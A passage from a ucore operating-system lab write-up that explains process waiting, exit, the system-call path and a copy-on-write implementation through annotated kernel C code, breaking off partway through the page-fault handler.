do_wait</h4><ul><li><p><code>do_wait</code> makes a process wait until a (specific) child process exits, then reclaims that child's resources and returns. It works as follows:</p><ul><li>If <code>code_store</code> is not NULL, check that it points to writable memory in the current process.</li><li>Look at the specified child, or at all children, for one that is waiting to be reclaimed by its parent (<code>PROC_ZOMBIE</code>).<ul><li>If one is found, reclaim it and return.</li><li>If none is found but a matching child exists, set the current process state to <code>PROC_SLEEPING</code> and call <code>schedule</code> to run other processes. When one of its children exits, the current process is woken up and reclaims the child's <strong>PCB memory</strong> in <code>do_wait</code>.</li><li>If there is no matching child at all, return <code>-E_BAD_PROC</code>.</li></ul></li></ul></li><li><p>The implementation is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span 
class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">do_wait</span><span class="params">(<span class="type">int</span> pid, <span class="type">int</span> *code_store)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mm_struct</span> *mm = current-&gt;mm;</span><br><span class="line">    <span class="keyword">if</span> (code_store != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span> (!<span class="built_in">user_mem_check</span>(mm, (<span class="type">uintptr_t</span>)code_store, <span class="built_in">sizeof</span>(<span class="type">int</span>), <span class="number">1</span>)) &#123;</span><br><span class="line">            <span class="keyword">return</span> -E_INVAL;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc;</span><br><span class="line">    <span class="type">bool</span> intr_flag, haskid;</span><br><span class="line">repeat:</span><br><span class="line">    haskid = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span> (pid != <span class="number">0</span>) &#123;</span><br><span class="line">        proc = <span class="built_in">find_proc</span>(pid);</span><br><span class="line">        <span class="keyword">if</span> (proc != <span class="literal">NULL</span> &amp;&amp; proc-&gt;parent == current) &#123;</span><br><span class="line">            haskid = <span class="number">1</span>;</span><br><span class="line">      
      <span class="keyword">if</span> (proc-&gt;state == PROC_ZOMBIE)</span><br><span class="line">                <span class="keyword">goto</span> found;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        proc = current-&gt;cptr;</span><br><span class="line">        <span class="keyword">for</span> (; proc != <span class="literal">NULL</span>; proc = proc-&gt;optr) &#123;</span><br><span class="line">            haskid = <span class="number">1</span>;</span><br><span class="line">            <span class="keyword">if</span> (proc-&gt;state == PROC_ZOMBIE)</span><br><span class="line">                <span class="keyword">goto</span> found;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (haskid) &#123;</span><br><span class="line">        current-&gt;state = PROC_SLEEPING;</span><br><span class="line">        current-&gt;wait_state = WT_CHILD;</span><br><span class="line">        <span class="built_in">schedule</span>();</span><br><span class="line">        <span class="keyword">if</span> (current-&gt;flags &amp; PF_EXITING)</span><br><span class="line">            <span class="built_in">do_exit</span>(-E_KILLED);</span><br><span class="line">        <span class="keyword">goto</span> repeat;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> -E_BAD_PROC;</span><br><span class="line"></span><br><span class="line">found:</span><br><span class="line">    <span class="keyword">if</span> (proc == idleproc || proc == initproc)</span><br><span class="line">        <span class="built_in">panic</span>(<span class="string">&quot;wait idleproc or initproc.\n&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span> (code_store != <span 
class="literal">NULL</span>)</span><br><span class="line">        *code_store = proc-&gt;exit_code;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">unhash_proc</span>(proc);</span><br><span class="line">        <span class="built_in">remove_links</span>(proc);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">    <span class="built_in">put_kstack</span>(proc);</span><br><span class="line">    <span class="built_in">kfree</span>(proc);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h4 id="4-do-exit">4. do_exit</h4><ul><li><p>This function resembles the process-reclaiming code in <code>do_execve/do_wait</code>, but differs in some respects. It works as follows:</p><ul><li><p>Release all memory (except the PCB, which only the parent process can reclaim).</p></li><li><p>Set the current process state to <code>PROC_ZOMBIE</code>.</p></li><li><p>Set the exit code of the current process, <code>current-&gt;exit_code</code>.</p></li><li><p>If the parent process is waiting for a child, wake it up so that it can reclaim the PCB of this process.</p><blockquote><p>Normally, every process other than <code>initproc</code> and <code>idleproc</code> has a parent process.</p></blockquote></li><li><p>If the current process has children, set the parent of every child to <code>initproc</code>. If those children later exit, <code>initproc</code> reclaims their resources instead.</p></li><li><p>Run the scheduler. As soon as the parent of the current process is scheduled, it can reclaim the <code>PCB</code> of the terminated process.</p></li></ul></li><li><p>The implementation is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span 
class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">do_exit</span><span class="params">(<span class="type">int</span> error_code)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (current == idleproc)</span><br><span class="line">        <span class="built_in">panic</span>(<span class="string">&quot;idleproc exit.\n&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span> (current == initproc)</span><br><span class="line">        <span class="built_in">panic</span>(<span class="string">&quot;initproc exit.\n&quot;</span>);</span><br><span class="line">    <span class="comment">// 释放所有内存空间</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mm_struct</span> *mm 
= current-&gt;mm;</span><br><span class="line">    <span class="keyword">if</span> (mm != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="built_in">lcr3</span>(boot_cr3);</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">mm_count_dec</span>(mm) == <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="built_in">exit_mmap</span>(mm);</span><br><span class="line">            <span class="built_in">put_pgdir</span>(mm);</span><br><span class="line">            <span class="built_in">mm_destroy</span>(mm);</span><br><span class="line">        &#125;</span><br><span class="line">        current-&gt;mm = <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 设置当前进程状态</span></span><br><span class="line">    current-&gt;state = PROC_ZOMBIE;</span><br><span class="line">    current-&gt;exit_code = error_code;</span><br><span class="line">    <span class="comment">// 请求父进程回收剩余资源</span></span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        proc = current-&gt;parent;</span><br><span class="line">        <span class="comment">// 唤醒父进程。父进程准备回收该进程的PCB资源。</span></span><br><span class="line">        <span class="keyword">if</span> (proc-&gt;wait_state == WT_CHILD)</span><br><span class="line">            <span class="built_in">wakeup_proc</span>(proc);</span><br><span class="line">        <span class="comment">// 如果当前进程存在子进程，则设置所有子进程的父进程为init。</span></span><br><span class="line">        <span class="keyword">while</span> (current-&gt;cptr != <span class="literal">NULL</span>) 
&#123;</span><br><span class="line">            proc = current-&gt;cptr;</span><br><span class="line">            current-&gt;cptr = proc-&gt;optr;</span><br><span class="line"></span><br><span class="line">            proc-&gt;yptr = <span class="literal">NULL</span>;</span><br><span class="line">            <span class="keyword">if</span> ((proc-&gt;optr = initproc-&gt;cptr) != <span class="literal">NULL</span>)</span><br><span class="line">                initproc-&gt;cptr-&gt;yptr = proc;</span><br><span class="line">            proc-&gt;parent = initproc;</span><br><span class="line">            initproc-&gt;cptr = proc;</span><br><span class="line">            <span class="keyword">if</span> (proc-&gt;state == PROC_ZOMBIE) &#123;</span><br><span class="line">                <span class="keyword">if</span> (initproc-&gt;wait_state == WT_CHILD)</span><br><span class="line">                    <span class="built_in">wakeup_proc</span>(initproc);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">    <span class="comment">// 该进程的生命周期即将结束，调度其他进程执行。</span></span><br><span class="line">    <span class="built_in">schedule</span>();</span><br><span class="line">    <span class="built_in">panic</span>(<span class="string">&quot;do_exit will not return!! %d.\n&quot;</span>, current-&gt;pid);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h4 id="5-syscall系统调用">5. 
System calls (syscall)</h4><ul><li><p><code>syscall</code> is the mechanism through which the kernel provides services to user programs.</p></li><li><p>A user program that needs a kernel service calls a <code>sys_xxxx</code> function, for example <code>sys_kill</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">sys_kill</span><span class="params">(<span class="type">int</span> pid)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">syscall</span>(SYS_kill, pid);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>In fact, every <code>sys_xxxx</code> function is a wrapper around the user-mode <code>syscall</code> function. Each wrapper sets up the arguments and calls <code>syscall</code>, which is implemented as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="keyword">inline</span> <span class="type">int</span> <span class="title">syscall</span><span class="params">(<span class="type">int</span> num, ...)</span> </span>&#123;</span><br><span class="line">    va_list ap;</span><br><span class="line">    <span 
class="built_in">va_start</span>(ap, num);</span><br><span class="line">    <span class="type">uint32_t</span> a[MAX_ARGS];</span><br><span class="line">    <span class="type">int</span> i, ret;</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; MAX_ARGS; i ++)</span><br><span class="line">        a[i] = <span class="built_in">va_arg</span>(ap, <span class="type">uint32_t</span>);</span><br><span class="line">    <span class="built_in">va_end</span>(ap);</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">asm</span> <span class="title">volatile</span> <span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="string">&quot;int %1;&quot;</span></span></span></span><br><span class="line"><span class="params"><span class="function">        : <span class="string">&quot;=a&quot;</span> (ret)</span></span></span><br><span class="line"><span class="params"><span class="function">        : <span class="string">&quot;i&quot;</span> (T_SYSCALL),</span></span></span><br><span class="line"><span class="params"><span class="function">          <span class="string">&quot;a&quot;</span> (num),</span></span></span><br><span class="line"><span class="params"><span class="function">          <span class="string">&quot;d&quot;</span> (a[<span class="number">0</span>]),</span></span></span><br><span class="line"><span class="params"><span class="function">          <span class="string">&quot;c&quot;</span> (a[<span class="number">1</span>]),</span></span></span><br><span class="line"><span class="params"><span class="function">          <span class="string">&quot;b&quot;</span> (a[<span class="number">2</span>]),</span></span></span><br><span class="line"><span class="params"><span class="function">          <span class="string">&quot;D&quot;</span> (a[<span 
class="number">3</span>]),</span></span></span><br><span class="line"><span class="params"><span class="function">          <span class="string">&quot;S&quot;</span> (a[<span class="number">4</span>])</span></span></span><br><span class="line"><span class="params"><span class="function">        : <span class="string">&quot;cc&quot;</span>, <span class="string">&quot;memory&quot;</span>)</span></span>;</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>This function loads the six registers <code>%eax, %edx, %ecx, %ebx, %edi, %esi</code> with the <strong>syscall number and arguments 1, 2, 3, 4, 5</strong> respectively, then executes the int instruction to enter the interrupt handler.</p></li><li><p>In the interrupt handler, the kernel dispatches on the trap number and runs the <code>syscall</code> function (note that this is the kernel's syscall function, not the one in the user library). The kernel syscall function reads the values of the six registers one by one and invokes the system call selected by the syscall number. Those system calls are themselves just wrappers around other kernel functions. The code of the kernel <code>syscall</code> function is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">syscall</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">trapframe</span> *tf = 
current-&gt;tf;</span><br><span class="line">    <span class="type">uint32_t</span> arg[<span class="number">5</span>];</span><br><span class="line">    <span class="type">int</span> num = tf-&gt;tf_regs.reg_eax;</span><br><span class="line">    <span class="keyword">if</span> (num &gt;= <span class="number">0</span> &amp;&amp; num &lt; NUM_SYSCALLS) &#123;</span><br><span class="line">        <span class="keyword">if</span> (syscalls[num] != <span class="literal">NULL</span>) &#123;</span><br><span class="line">            arg[<span class="number">0</span>] = tf-&gt;tf_regs.reg_edx;</span><br><span class="line">            arg[<span class="number">1</span>] = tf-&gt;tf_regs.reg_ecx;</span><br><span class="line">            arg[<span class="number">2</span>] = tf-&gt;tf_regs.reg_ebx;</span><br><span class="line">            arg[<span class="number">3</span>] = tf-&gt;tf_regs.reg_edi;</span><br><span class="line">            arg[<span class="number">4</span>] = tf-&gt;tf_regs.reg_esi;</span><br><span class="line">            tf-&gt;tf_regs.reg_eax = syscalls[num](arg);</span><br><span class="line">            <span class="keyword">return</span> ;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">print_trapframe</span>(tf);</span><br><span class="line">    <span class="built_in">panic</span>(<span class="string">&quot;undefined syscall %d, pid = %d, name = %s.\n&quot;</span>,</span><br><span class="line">            num, current-&gt;pid, current-&gt;name);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>等相应的内核函数结束后，程序通过之前保留的<code>trapframe</code>返回用户态。一次系统调用结束。</p></li></ul><h4 id="Questions">*. 
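Questions</h4><p>Briefly describe your analysis of the fork/exec/wait/exit functions, and answer the following questions:</p><ul><li><p>How do fork/exec/wait/exit affect the execution state of a process in their implementation?</p><ul><li>fork sets the state of the child process to <code>PROC_RUNNABLE</code>; the state of the current process does not change.</li><li>exec does not change the state of the current process, but it replaces all the code and data in its address space.</li><li>wait first checks whether a child process exists. If there is a child in the <code>PROC_ZOMBIE</code> state, it reclaims that child and returns. If the children are still <code>PROC_RUNNABLE</code>, the current process enters the <code>PROC_SLEEPING</code> state and waits for a child to wake it.</li><li>exit sets the current process state to <code>PROC_ZOMBIE</code>, wakes the parent process if it is waiting so that it becomes <code>PROC_RUNNABLE</code>, and then voluntarily gives up the CPU.</li></ul></li><li><p>Draw the execution-state lifecycle diagram of a user-mode process in ucore (including the execution states, the transitions between them, and the events or function calls that cause each transition).</p>  <pre class="mermaid">    stateDiagram-v2
  [*]-->UNINIT : alloc_proc
  UNINIT-->RUNNABLE : proc_init/wakeup_proc
  RUNNING-->SLEEPING : try_free_pages/do_wait/do_sleep
  RUNNING-->ZOMBIE : do_exit
  RUNNABLE-->RUNNING : picked by the scheduler
  RUNNING-->RUNNABLE : time slice exhausted
  SLEEPING-->RUNNABLE : wakeup_proc
  ZOMBIE-->[*] : resources reclaimed</pre></li></ul><h3 id="4-扩展练习">4) Extended Exercise</h3><blockquote><p><strong>Implement the Copy on Write (COW) mechanism</strong></p><p>Since COW is fairly complex to implement and prone to bugs, refer to <a href="https://dirtycow.ninja/">Dirty COW (CVE-2016-5195)</a> and see whether you can reproduce this bug and its fix in ucore's COW implementation. An explanation is required.</p><p>This is a big challenge.</p></blockquote><h4 id="1-思路">1. Approach</h4><p>When a user parent process creates a child process, the parent marks the user space it has allocated as read-only, and the child shares the pages of the parent's user memory (a shared resource). When either process modifies a page in this user memory, ucore learns of the write through a page fault and copies the page, so that each process ends up with its own copy. A modification made by one process is then not visible to the other. (Quoted from the uCore lab manual.)</p><h4 id="2-具体实现">2. 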
Implementation</h4><ul><li><p>On a memory access, the CPU checks the present bit <code>PTE_P</code> and the writable bit <code>PTE_W</code> in the PTE to decide whether the access is allowed; if it is not, a page fault is raised. In <code>copy_range</code> we can clear <code>PTE_W</code> in all of the parent's PTEs, which makes the parent's whole user space read-only. We then point the child's PTEs at the same physical pages as the parent's PTEs, which achieves memory sharing.</p><blockquote><p>Why make all of the parent's space read-only? Because any later write to this space triggers a page fault, and the kernel can then copy the page in the page-fault handler. That is copy on write.</p></blockquote><blockquote><p>Why implement the sharing in copy_range? Because that function already receives a <code>share</code> parameter that we can act on.</p></blockquote><p>The final implementation is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span 
class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">copy_range</span><span class="params">(<span class="type">pde_t</span> *to, <span class="type">pde_t</span> *from, <span class="type">uintptr_t</span> start, <span class="type">uintptr_t</span> end, <span class="type">bool</span> share)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">assert</span>(start % PGSIZE == <span class="number">0</span> &amp;&amp; end % PGSIZE == <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">assert</span>(<span class="built_in">USER_ACCESS</span>(start, end));</span><br><span class="line">    <span class="comment">// copy content by page unit.</span></span><br><span class="line">    <span class="keyword">do</span> &#123;</span><br><span class="line">        <span class="comment">//call get_pte to find process A&#x27;s pte according to the addr start</span></span><br><span class="line">        <span class="type">pte_t</span> *ptep = <span class="built_in">get_pte</span>(from, start, <span class="number">0</span>), *nptep;</span><br><span class="line">        <span class="keyword">if</span> (ptep == <span class="literal">NULL</span>) &#123;</span><br><span class="line">            start = <span class="built_in">ROUNDDOWN</span>(start + PTSIZE, PTSIZE);</span><br><span class="line">            <span class="keyword">continue</span> ;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">//call get_pte to find process B&#x27;s pte according to the addr start. 
If pte is NULL, just alloc a PT</span></span><br><span class="line">        <span class="keyword">if</span> (*ptep &amp; PTE_P) &#123;</span><br><span class="line">            <span class="keyword">if</span> ((nptep = <span class="built_in">get_pte</span>(to, start, <span class="number">1</span>)) == <span class="literal">NULL</span>)</span><br><span class="line">                <span class="keyword">return</span> -E_NO_MEM;</span><br><span class="line">            <span class="type">uint32_t</span> perm = (*ptep &amp; PTE_USER);</span><br><span class="line">            <span class="comment">//get page from ptep</span></span><br><span class="line">            <span class="keyword">struct</span> <span class="title class_">Page</span> *page = <span class="built_in">pte2page</span>(*ptep);</span><br><span class="line">            <span class="type">int</span> ret = <span class="number">0</span>;</span><br><span class="line">            <span class="comment">// 如果启用写时复制</span></span><br><span class="line">            <span class="keyword">if</span>(share)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="built_in">cprintf</span>(<span class="string">&quot;Sharing the page 0x%x\n&quot;</span>, <span class="built_in">page2kva</span>(page));</span><br><span class="line">                <span class="comment">// 物理页面共享，并设置两个PTE上的标志位为只读</span></span><br><span class="line">                <span class="built_in">page_insert</span>(from, page, start, perm &amp; ~PTE_W);</span><br><span class="line">                ret = <span class="built_in">page_insert</span>(to, page, start, perm &amp; ~PTE_W);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// 完整拷贝内存</span></span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">            &#123;</span><br><span class="line">                <span class="comment">// alloc a 
page for process B</span></span><br><span class="line">                <span class="comment">// 目标页面地址</span></span><br><span class="line">                <span class="keyword">struct</span> Page *npage = <span class="built_in">alloc_page</span>();</span><br><span class="line">                <span class="built_in">assert</span>(page!=<span class="literal">NULL</span>);</span><br><span class="line">                <span class="built_in">assert</span>(npage!=<span class="literal">NULL</span>);</span><br><span class="line">                <span class="built_in">cprintf</span>(<span class="string">&quot;alloc a new page 0x%x\n&quot;</span>, <span class="built_in">page2kva</span>(npage));</span><br><span class="line">                <span class="type">void</span> * kva_src = <span class="built_in">page2kva</span>(page);</span><br><span class="line">                <span class="type">void</span> * kva_dst = <span class="built_in">page2kva</span>(npage);</span><br><span class="line">                <span class="built_in">memcpy</span>(kva_dst, kva_src, PGSIZE);</span><br><span class="line">                <span class="comment">// 将目标页面地址设置到PTE中</span></span><br><span class="line">                ret = <span class="built_in">page_insert</span>(to, npage, start, perm);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="built_in">assert</span>(ret == <span class="number">0</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        start += PGSIZE;</span><br><span class="line">    &#125; <span class="keyword">while</span> (start != <span class="number">0</span> &amp;&amp; start &lt; end);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>When a process tries to write to a shared page, <code>PTE_W</code> in its PTE is 0, so the page-fault handler is triggered. The handler must then copy the page for that process and set <code>PTE_W</code> to 1 in the PTE of the new page.</p><blockquote><p>Note that before copying memory in the page-fault handler, the reference count of the physical page must be checked. If the count is already 1, only the current process is using the page, so it is enough to set <code>PTE_W</code> to 1 in the corresponding PTE; no copy is needed.</p></blockquote><p>The final implementation is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span 
class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">do_pgfault</span><span class="params">(<span class="keyword">struct</span> mm_struct *mm, <span class="type">uint32_t</span> error_code, <span class="type">uintptr_t</span> addr)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// ........</span></span><br><span class="line">    <span class="comment">// look up the page table entry for the faulting virtual address</span></span><br><span class="line">    <span class="keyword">if</span> ((ptep = <span class="built_in">get_pte</span>(mm-&gt;pgdir, addr, <span class="number">1</span>)) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;get_pte in do_pgfault failed\n&quot;</span>);</span><br><span class="line">        <span class="keyword">goto</span> failed;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// if this page table entry maps no physical page, then</span></span><br><span class="line">    <span class="keyword">if</span> (*ptep == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// allocate a physical page and set the page table entry</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">pgdir_alloc_page</span>(mm-&gt;pgdir, addr, perm) == <span class="literal">NULL</span>) 
&#123;</span><br><span class="line">            <span class="built_in">cprintf</span>(<span class="string">&quot;pgdir_alloc_page in do_pgfault failed\n&quot;</span>);</span><br><span class="line">            <span class="keyword">goto</span> failed;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">struct</span> Page *page=<span class="literal">NULL</span>;</span><br><span class="line">        <span class="comment">// if the fault was caused by a write to a read-only page</span></span><br><span class="line">        <span class="keyword">if</span> (*ptep &amp; PTE_P) &#123;</span><br><span class="line">            <span class="comment">// copy-on-write: copy the page for the current process</span></span><br><span class="line">            <span class="built_in">cprintf</span>(<span class="string">&quot;\n\nCOW: ptep 0x%x, pte 0x%x\n&quot;</span>,ptep, *ptep);</span><br><span class="line">            <span class="comment">// the read-only physical page used so far</span></span><br><span class="line">            page = <span class="built_in">pte2page</span>(*ptep);</span><br><span class="line">            <span class="comment">// if the physical page is referenced by more than one process</span></span><br><span class="line">            <span class="keyword">if</span>(<span class="built_in">page_ref</span>(page) &gt; <span class="number">1</span>)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="comment">// drop the reference held by the current PTE and allocate a new physical page</span></span><br><span class="line">                <span class="keyword">struct</span> <span class="title class_">Page</span>* newPage = <span class="built_in">pgdir_alloc_page</span>(mm-&gt;pgdir, addr, perm);</span><br><span class="line">                <span class="type">void</span> * kva_src = <span class="built_in">page2kva</span>(page);</span><br><span class="line">                <span class="type">void</span> * kva_dst = <span 
